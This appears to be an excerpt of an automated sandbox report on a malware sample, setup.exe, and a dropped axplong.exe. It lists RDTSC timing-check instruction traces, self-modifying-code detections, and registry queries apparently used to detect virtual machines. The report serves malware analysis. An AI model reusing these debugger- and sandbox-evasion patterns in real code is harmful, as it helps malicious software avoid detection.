                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B02AA second address: 47B0313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4F77h 0x00000007 pushfd 0x00000008 jmp 00007FE0B4522B1Ch 0x0000000d adc esi, 5B654768h 0x00000013 jmp 00007FE0B4522B1Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FE0B4522B24h 0x00000025 jmp 00007FE0B4522B25h 0x0000002a popfd 0x0000002b push eax 0x0000002c movsx ebx, cx 0x0000002f pop ecx 0x00000030 popad 0x00000031 je 00007FE127500E24h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0313 second address: 47B0323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0323 second address: 47B0385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov al, 7Ah 0x00000013 pushfd 0x00000014 jmp 00007FE0B4522B21h 0x00000019 jmp 00007FE0B4522B1Bh 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007FE127500DE6h 0x00000026 pushad 0x00000027 mov eax, 43C86A0Bh 0x0000002c mov bh, cl 0x0000002e popad 0x0000002f mov edx, dword ptr [esi+44h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE0B4522B26h 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0385 second address: 47B0397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DCEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0397 second address: 47B03C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE0B4522B25h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B03C2 second address: 47B0448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE0B4F44DD7h 0x00000009 sub si, 239Eh 0x0000000e jmp 00007FE0B4F44DD9h 0x00000013 popfd 0x00000014 mov ch, 33h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test edx, 61000000h 0x0000001f jmp 00007FE0B4F44DD3h 0x00000024 jne 00007FE127F23034h 0x0000002a jmp 00007FE0B4F44DD6h 0x0000002f test byte ptr [esi+48h], 00000001h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE0B4F44DCAh 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0448 second address: 47B044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B044E second address: 47B046C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE127F23007h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B046C second address: 47B0470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0470 second address: 47B0476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0476 second address: 47B047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B047C second address: 47B0480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A070D second address: 47A0728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 6367EA99h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE0B4522B1Bh 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0728 second address: 47A0740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0740 second address: 47A0777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FE0B4522B27h 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE0B4522B20h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0777 second address: 47A077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A077D second address: 47A079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 5583h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE0B4522B21h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A079F second address: 47A07A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07A5 second address: 47A07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE0B4522B20h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07CD second address: 47A07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07D1 second address: 47A07D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07D7 second address: 47A080E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE0B4F44DCBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FE0B4F44DCBh 0x00000018 pop eax 0x00000019 mov ah, dh 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A080E second address: 47A0837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE0B4522B25h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0837 second address: 47A083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A083D second address: 47A0841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0841 second address: 47A0871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE0B4F44DD1h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0871 second address: 47A0877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0877 second address: 47A08C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 je 00007FE127F2A8BEh 0x00000019 pushad 0x0000001a mov si, 4093h 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushad 0x0000002b mov ax, di 0x0000002e movsx ebx, si 0x00000031 popad 0x00000032 mov di, ax 0x00000035 popad 0x00000036 mov ecx, esi 0x00000038 pushad 0x00000039 mov cl, 84h 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A08C1 second address: 47A0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 je 00007FE1275085F2h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4522B27h 0x00000013 adc ah, FFFFFF8Eh 0x00000016 jmp 00007FE0B4522B29h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FE0B4522B20h 0x00000022 adc cl, 00000008h 0x00000025 jmp 00007FE0B4522B1Bh 0x0000002a popfd 0x0000002b popad 0x0000002c test byte ptr [77816968h], 00000002h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0931 second address: 47A0935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0935 second address: 47A093B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A093B second address: 47A0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0941 second address: 47A0990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE127508583h 0x0000000e jmp 00007FE0B4522B20h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 pushad 0x00000017 mov di, cx 0x0000001a call 00007FE0B4522B1Ah 0x0000001f push eax 0x00000020 pop ebx 0x00000021 pop ecx 0x00000022 popad 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE0B4522B29h 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0990 second address: 47A09D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007FE0B4F44DCEh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE0B4F44DD7h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A09D0 second address: 47A09FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d mov dx, EC2Eh 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A09FD second address: 47A0A0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A0B second address: 47A0A10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A68 second address: 47A0A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A6C second address: 47A0A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A87 second address: 47A0A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A9F second address: 47A0B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a call 00007FE0B4522B1Dh 0x0000000f pushfd 0x00000010 jmp 00007FE0B4522B20h 0x00000015 jmp 00007FE0B4522B25h 0x0000001a popfd 0x0000001b pop esi 0x0000001c mov ah, dl 0x0000001e popad 0x0000001f mov esp, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FE0B4522B24h 0x0000002a jmp 00007FE0B4522B25h 0x0000002f popfd 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0E79 second address: 47B0E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0E7F second address: 47B0E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0E83 second address: 47B0EFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4F44DCFh 0x00000013 xor si, 9B2Eh 0x00000018 jmp 00007FE0B4F44DD9h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 movsx edx, ax 0x00000024 mov cl, D0h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FE0B4F44DD7h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE0B4F44DD5h 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0B86 second address: 47B0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48307FC second address: 4830802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4830802 second address: 4830806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4830806 second address: 4830836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE0B4F44DCEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FE0B4F44DD0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4830836 second address: 483083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 483083C second address: 4830860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 10AE1E05h 0x00000011 jmp 00007FE0B4F44DD2h 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820A69 second address: 4820A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820A6D second address: 4820A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820A73 second address: 4820A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B1Eh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48208F5 second address: 48208F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48208F9 second address: 48208FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48208FD second address: 4820903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820903 second address: 4820934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov ecx, 148E2F87h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FE0B4522B1Ah 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820934 second address: 4820938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820938 second address: 482093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 482093C second address: 4820942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C02C4 second address: 47C02E6 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4522B27h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CBA second address: 4820CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CC0 second address: 4820CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CC4 second address: 4820CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4F44DCBh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CDA second address: 4820D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FE0B4522B1Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE0B4522B1Bh 0x0000001a xor si, D15Eh 0x0000001f jmp 00007FE0B4522B29h 0x00000024 popfd 0x00000025 mov eax, 07527627h 0x0000002a popad 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820D25 second address: 4820D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE0B4F44DCEh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820D4F second address: 4820D55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820D55 second address: 4820DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE0B4F44DD0h 0x0000000b xor ah, FFFFFFE8h 0x0000000e jmp 00007FE0B4F44DCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+08h] 0x0000001a jmp 00007FE0B4F44DD6h 0x0000001f push 91FA1017h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FE0B4F44DD3h 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820DB2 second address: 4820DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820DB6 second address: 4820DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820E16 second address: 4820E30 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE0B4522B20h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7C580 second address: E7C584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06D5 second address: 47D06EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06EB second address: 47D06EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06EF second address: 47D06F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06F5 second address: 47D06FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06FB second address: 47D06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: CBECF7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: CBEC2B instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: E9B835 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: E8145C instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: EFE86A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: ADECF7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: ADEC2B instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: CBB835 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: CA145C instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: D1E86A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
